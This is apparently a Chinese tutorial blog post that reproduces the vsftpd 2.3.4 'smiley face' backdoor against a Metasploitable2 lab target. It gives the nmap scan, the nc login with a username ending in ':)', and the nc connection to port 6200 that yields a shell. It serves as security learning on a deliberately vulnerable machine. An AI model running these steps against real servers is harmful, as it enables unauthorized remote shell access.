VSFTP2.3.4(笑脸漏洞)

2021/12/17 6:25:57

本文主要是介绍VSFTP2.3.4(笑脸漏洞),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

一、准备工作

1、攻击机和靶机都处于NAT模式

2、攻击机:kali(192.168.252.131)

3、靶机:metasploitable2()

 

二、漏洞复现1、用nmap进行信息收集,输入nmap -sV 192.168.252.130,可以知道靶机开放了21端口,21端口提供ftp服务,ftp的版本信息是vsftpd 2.3.4

 2、输入 nmap -p 6200 192.168.252.130,发现靶机的6200端口是关闭的

3、另外在打开一个终端,用nc来连接靶机的21端口。输入:nc 192.168.252.130 21,然后输入user为 a:),pass随便输。

 

 4、再次查看靶机的6200端口,发现打开了

 5、用nc连接靶机的6200端口,输入nc 192.168.252.130 6200,输入whoami

 

 



这篇关于VSFTP2.3.4(笑脸漏洞)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程